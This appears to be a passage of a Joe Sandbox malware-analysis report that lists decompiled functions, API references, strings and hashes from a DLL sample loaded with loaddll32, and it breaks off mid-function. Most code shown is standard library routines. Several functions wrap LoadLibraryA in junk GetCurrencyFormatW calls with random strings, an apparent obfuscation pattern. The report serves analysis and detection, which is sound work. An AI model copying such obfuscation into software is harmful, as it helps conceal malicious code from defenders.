Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CloseDeleteEnumH_prolog3H_prolog3_catchOpen
String ID:
API String ID: 301487041-0
Opcode ID: 30927a9a5a5225e6a5d87cb90a9f359c3c04349a4499108c5426f94dc879b8ba
Instruction ID: 857dbc2a6ce260c152275e15a4f46308dc9617d79fc9f0d391124e600494f057
Opcode Fuzzy Hash: 30927a9a5a5225e6a5d87cb90a9f359c3c04349a4499108c5426f94dc879b8ba
Instruction Fuzzy Hash: 2A21D075D0425A9FEB25DB64CD41AEEB7B0FF08390F10422AED55AB290DB345E44DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001BA34 Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E1001BA34(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t22;
				int _t32;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t22 =  *0x10048630; // 0x60
					_t12 =  *0x10048634; // 0x60
					goto L6;
				} else {
					_t32 = GetMapMode( *(__ecx + 8));
					if(_t32 >= 7 || _t32 == 1) {
						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E1000FE50(__ecx, _a4);
						_push(_t32);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}

0x1001ba37
0x1001ba3a
0x1001ba3f
0x1001ba8b
0x1001ba91
0x00000000
0x1001ba41
0x1001ba4a
0x1001ba4f
0x1001ba85
0x1001ba87
0x1001ba96
0x1001ba96
0x1001baa8
0x1001bab0
0x1001bab6
0x1001bab8
0x1001ba56
0x1001ba58
0x1001ba5c
0x1001ba64
0x1001ba6b
0x1001ba6e
0x1001ba6e
0x1001ba4f
0x1001babf

APIs

GetMapMode.GDI32(?,?,?,?,?,?,10015D46,?,00000000,0000001C,100166B4,?,?,?,?,?), ref: 1001BA44
GetDeviceCaps.GDI32(?,00000058), ref: 1001BA7E
GetDeviceCaps.GDI32(?,0000005A), ref: 1001BA87

Part of subcall function 1000FE50: MulDiv.KERNEL32(?,00000000,00000000), ref: 1000FE90
Part of subcall function 1000FE50: MulDiv.KERNEL32(?,00000000,00000000), ref: 1000FEAD

MulDiv.KERNEL32(?,000009EC,00000060), ref: 1001BAAB
MulDiv.KERNEL32(00000000,000009EC,?), ref: 1001BAB6

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: 5840f87b3609487458aaab7b763707c6ac1ff970de9859fc770cd0648c671529
Instruction ID: 22d9993a61e9b7a788ac8545e9176f77a0c9c7fd087465b0058942df5384f877
Opcode Fuzzy Hash: 5840f87b3609487458aaab7b763707c6ac1ff970de9859fc770cd0648c671529
Instruction Fuzzy Hash: D411E131600A14EFDB22AF55CC85D0EBBE9EF89750B124419FA829B361CB72ED41DF90

Uniqueness

Uniqueness Score: -1.00%

Function 1001BAC2 Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E1001BAC2(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t30;
				int _t33;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t30 =  *0x10048630; // 0x60
					_t12 =  *0x10048634; // 0x60
					goto L6;
				} else {
					_t33 = GetMapMode( *(__ecx + 8));
					if(_t33 >= 7 || _t33 == 1) {
						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
						_t14 = MulDiv(_t36[1], _v8, 0x9ec);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E1000FDE7(__ecx, _a4);
						_push(_t33);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}

0x1001bac5
0x1001bac8
0x1001bacd
0x1001bb19
0x1001bb1f
0x00000000
0x1001bacf
0x1001bad8
0x1001badd
0x1001bb13
0x1001bb15
0x1001bb24
0x1001bb24
0x1001bb36
0x1001bb3f
0x1001bb44
0x1001bb46
0x1001bae4
0x1001bae6
0x1001baea
0x1001baf2
0x1001baf9
0x1001bafc
0x1001bafc
0x1001badd
0x1001bb4d

APIs

GetMapMode.GDI32(?,00000000,?,?,?,?,10015D8A,?,?,?,?,?,?), ref: 1001BAD2
GetDeviceCaps.GDI32(?,00000058), ref: 1001BB0C
GetDeviceCaps.GDI32(?,0000005A), ref: 1001BB15

Part of subcall function 1000FDE7: MulDiv.KERNEL32(?,00000000,00000000), ref: 1000FE27
Part of subcall function 1000FDE7: MulDiv.KERNEL32(?,00000000,00000000), ref: 1000FE44

MulDiv.KERNEL32(?,00000060,000009EC), ref: 1001BB39
MulDiv.KERNEL32(00000000,?,000009EC), ref: 1001BB44

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: 52b1341bc56cc0c3782e191dcf6f63c187834ad54c4c27d76bd8348fdb9a1aa1
Instruction ID: 64b43f4f01bdcb0d49ba4a6e9a36d092bff00c01b953ac3af172aaf16eee57d7
Opcode Fuzzy Hash: 52b1341bc56cc0c3782e191dcf6f63c187834ad54c4c27d76bd8348fdb9a1aa1
Instruction Fuzzy Hash: CF11AC35600A14AFEB22AF56CC85C1EBBF9EF89750B124419FA829B761C771ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10011005 Relevance: 7.6, APIs: 5, Instructions: 53
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10011005(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
				signed int _v8;
				char _v263;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HWND__* _t21;
				void* _t22;
				intOrPtr _t25;
				void* _t26;
				int _t27;
				CHAR* _t28;
				signed int _t29;

				_t25 = __edx;
				_t22 = __ecx;
				_t9 =  *0x10045580; // 0xe155dca3
				_v8 = _t9 ^ _t29;
				_t21 = _a4;
				_t32 = _t21;
				_t28 = _a8;
				if(_t21 == 0) {
					L1:
					E10004E6E(_t21, _t22, _t26, _t28, _t32);
				}
				if(_t28 == 0) {
					goto L1;
				}
				_t27 = lstrlenA(_t28);
				_v264 = 0;
				E10020F40(_t27,  &_v263, 0, 0xff);
				if(_t27 > 0x100 || GetWindowTextA(_t21,  &_v264, 0x100) != _t27 || lstrcmpA( &_v264, _t28) != 0) {
					_t16 = SetWindowTextA(_t21, _t28);
				}
				return E1001FBB5(_t16, _t21, _v8 ^ _t29, _t25, _t27, _t28);
			}

0x10011005
0x10011005
0x1001100e
0x10011015
0x10011019
0x1001101c
0x1001101f
0x10011023
0x10011025
0x10011025
0x10011025
0x1001102c
0x00000000
0x00000000
0x1001103a
0x10011045
0x1001104c
0x1001105b
0x10011084
0x10011084
0x10011098

APIs

lstrlenA.KERNEL32(?), ref: 1001102F
_memset.LIBCMT ref: 1001104C
GetWindowTextA.USER32 ref: 10011066
lstrcmpA.KERNEL32(00000000,?), ref: 10011078
SetWindowTextA.USER32(?,?), ref: 10011084

Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
String ID:
API String ID: 4273134663-0
Opcode ID: 4c9b521e76057fc99441da0c168c3e684543e59944e4fe8cf20e588bc23182cd
Instruction ID: 10167af52a95b6190f72f3b34ec66ed1a7e9255054ff2824fd61587a0385250f
Opcode Fuzzy Hash: 4c9b521e76057fc99441da0c168c3e684543e59944e4fe8cf20e588bc23182cd
Instruction Fuzzy Hash: 22018476A01268ABE712DB64CCC4BDF77ACEB59780F014065F946DB142EAB1DEC48760

Uniqueness

Uniqueness Score: -1.00%

Function 10008551 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E10008551(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;

				if(E100083A5() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							E1002291E(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x100482f0(_a4, _a8);
			}

0x1000855e
0x10008577
0x100085e2
0x100085e2
0x100085e4
0x00000000
0x100085e5
0x10008579
0x10008580
0x00000000
0x10008599
0x1000859a
0x1000859d
0x100085ab
0x100085ae
0x100085b6
0x100085b7
0x100085b8
0x100085b9
0x100085c0
0x100085c3
0x100085c7
0x100085d6
0x100085db
0x100085de
0x00000000
0x100085de
0x10008580
0x00000000

APIs

SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 1000858F
GetSystemMetrics.USER32 ref: 100085A7
GetSystemMetrics.USER32 ref: 100085AE

Strings

DISPLAY, xrefs: 100085CB

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: System$Metrics$InfoParameters
String ID: DISPLAY
API String ID: 3136151823-865373369
Opcode ID: 3e672ade7eb21542bf4ad099db13503eb2e79d1d00444ef13faf9d4c700962cf
Instruction ID: ce2e2f080287dd97aac08b6d54948a152684e982f167b1d142294c492be0e5a9
Opcode Fuzzy Hash: 3e672ade7eb21542bf4ad099db13503eb2e79d1d00444ef13faf9d4c700962cf
Instruction Fuzzy Hash: 9B119471901624ABEB56DF648C8465B7BA9FF05781F118052FD45AE04AD271DB00CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 1000BA02 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E1000BA02(void* __ebx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* __esi;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				void* _t25;
				void* _t26;
				void* _t28;

				_t28 = __eflags;
				_t24 = __edi;
				_t21 = __ebx;
				E10011382(__ebx, _t25, __ebp, 0xc);
				_push(E1000AEB0);
				_t26 = E10010657(__ebx, 0x10048470, __edi, _t25, _t28);
				_t29 = _t26;
				if(_t26 == 0) {
					E10004E6E(_t21, 0x10048470, __edi, _t26, _t29);
				}
				_t30 =  *(_t26 + 8);
				if( *(_t26 + 8) != 0) {
					L7:
					E100113EF(0xc);
					return  *(_t26 + 8)(_v4, _v0, _a4, _a8);
				} else {
					_push("hhctrl.ocx");
					_t16 = E100094FA(_t21, 0x10048470, _t24, _t26, _t30);
					 *(_t26 + 4) = _t16;
					if(_t16 != 0) {
						_t17 = GetProcAddress(_t16, "HtmlHelpA");
						__eflags = _t17;
						 *(_t26 + 8) = _t17;
						if(_t17 != 0) {
							goto L7;
						}
						FreeLibrary( *(_t26 + 4));
						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
					}
					return 0;
				}
			}

0x1000ba02
0x1000ba02
0x1000ba02
0x1000ba05
0x1000ba0a
0x1000ba19
0x1000ba1b
0x1000ba1d
0x1000ba1f
0x1000ba1f
0x1000ba24
0x1000ba28
0x1000ba62
0x1000ba64
0x00000000
0x1000ba2a
0x1000ba2a
0x1000ba2f
0x1000ba37
0x1000ba3a
0x1000ba46
0x1000ba4c
0x1000ba4e
0x1000ba51
0x00000000
0x00000000
0x1000ba56
0x1000ba5c
0x1000ba5c
0x00000000
0x1000ba3c

APIs

Part of subcall function 10011382: EnterCriticalSection.KERNEL32(10048810,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113BE
Part of subcall function 10011382: InitializeCriticalSection.KERNEL32(10003840,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113CD
Part of subcall function 10011382: LeaveCriticalSection.KERNEL32(10048810,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113DA
Part of subcall function 10011382: EnterCriticalSection.KERNEL32(10003840,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113E6

Part of subcall function 10010657: __EH_prolog3_catch.LIBCMT ref: 1001065E

Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F

GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 1000BA46
FreeLibrary.KERNEL32(?), ref: 1000BA56

Strings

hhctrl.ocx, xrefs: 1000BA2A
HtmlHelpA, xrefs: 1000BA40

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpA$hhctrl.ocx
API String ID: 2853499158-63838506
Opcode ID: e901df98c7b20211684d7a886c9f888567c58a51fe2962439f01aaedd25188f5
Instruction ID: fae18e8e3df8c99190cd81beb17d79f1be991ccf9ce49b00c1c0f37f4cd6cf67
Opcode Fuzzy Hash: e901df98c7b20211684d7a886c9f888567c58a51fe2962439f01aaedd25188f5
Instruction Fuzzy Hash: 97018135204B03AFE322DF60DD05B4F7AD0EF457D1F018818F19AA5565DB30E9409623

Uniqueness

Uniqueness Score: -1.00%

Function 100030AA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100030AA(intOrPtr _a4, intOrPtr _a8) {
				signed int _t7;
				short* _t20;

				_t20 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_t7 = GetCurrencyFormatW(0, 0x11d4, _t20, 0, L"xadqsavcbdfewescGADW", 0x22b9);
				return E10020530( *((intOrPtr*)(_a4 + _t7 *  *0x100440d0 * 8)),  *((intOrPtr*)(_a8 + GetCurrencyFormatW(0, 0x11d4, _t20, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 * 8)));
			}

0x100030c0
0x100030ce
0x1000310d

APIs

GetCurrencyFormatW.KERNEL32 ref: 100030CE
GetCurrencyFormatW.KERNEL32 ref: 100030EE

Strings

xadqsavcbdfewescGADW, xrefs: 100030B9, 100030E0
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 100030C0, 100030C5

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: eba1907676d7a635ea872fac9ed42042c5b18c37b6e64dbe33ba4f6f63d73e35
Instruction ID: 846c07d914ee6a27032255a918b4843dc12a0f64b55843b4788eb39cb2351f94
Opcode Fuzzy Hash: eba1907676d7a635ea872fac9ed42042c5b18c37b6e64dbe33ba4f6f63d73e35
Instruction Fuzzy Hash: 7BF0B4312443197FE205D740EC82F927B5DD78A745F010056F700AF0E2CB6338248FA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002BDD1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E1002BDD1() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x10039fd0;
					_v28 =  *0x10039fc8;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x1002bdd6
0x1002bdde
0x1002bdf5
0x1002bda1
0x1002bdaa
0x1002bdb6
0x1002bdb9
0x1002bdbc
0x1002bdbe
0x1002bdc1
0x1002bdc6
0x1002bdd0
0x1002bdc8
0x1002bdcc
0x1002bdcc
0x1002bde0
0x1002bde6
0x1002bdee
0x00000000
0x1002bdf0
0x1002bdf0
0x1002bdf4
0x1002bdf4
0x1002bdee

APIs

GetModuleHandleA.KERNEL32(KERNEL32,1002361A), ref: 1002BDD6
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1002BDE6

Strings

KERNEL32, xrefs: 1002BDD1
IsProcessorFeaturePresent, xrefs: 1002BDE0

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 28f514ccd754736609f33c51daedfd0aeac528797be2892e988ff456b478d1a6
Instruction ID: e32e5489c0f8680f0bdbeaaa6a49d62586903b2bdf2b5a8f28566646894aba65
Opcode Fuzzy Hash: 28f514ccd754736609f33c51daedfd0aeac528797be2892e988ff456b478d1a6
Instruction Fuzzy Hash: 94F03A20A00E1ADAEF01ABA1AD492EF7BB8FB84746F9245A0D592E4099EF318074D251

Uniqueness

Uniqueness Score: -1.00%

Function 10003057 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10003057(CHAR* _a4) {
				signed int _t2;

				_t2 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
				return  &((LoadLibraryA(_a4))[_t2 *  *0x100440d0]);
			}

0x10003070
0x1000308f

APIs

GetCurrencyFormatW.KERNEL32 ref: 10003070
LoadLibraryA.KERNEL32(?), ref: 10003086

Strings

xadqsavcbdfewescGADW, xrefs: 1000305D
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10003064

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CurrencyFormatLibraryLoad
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 1566795320-3161301136
Opcode ID: b688c3496de217a7e3c91dcb6abf11db8e2619d95133c7353a921a1f77c43571
Instruction ID: c8b8bc68fb586c21cf620b45a97a61bfa4732d23f622789b4932f32e46aada1a
Opcode Fuzzy Hash: b688c3496de217a7e3c91dcb6abf11db8e2619d95133c7353a921a1f77c43571
Instruction Fuzzy Hash: 37D05E32644230BAE2125790AD4AFC2AB14E75A752F028004FB04FD5E1C36004A08EA5

Uniqueness

Uniqueness Score: -1.00%

Function 10018DA4 Relevance: 6.3, APIs: 4, Instructions: 309
memoryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10018DA4(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16, char _a20, signed int _a44, signed int _a48, signed int _a52, intOrPtr _a56, signed int _a60, intOrPtr _a64, char _a68, intOrPtr _a92, signed int _a96, signed int _a100, intOrPtr _a104, signed int _a108, intOrPtr _a112, signed int _a116, char _a120) {
				signed int _v4;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				void* _v40;
				char _v124;
				char _v168;
				char _v176;
				char _v184;
				intOrPtr _v196;
				signed int* __ebp;
				signed int _t132;
				signed int _t138;
				signed int _t139;
				void* _t140;
				intOrPtr* _t145;
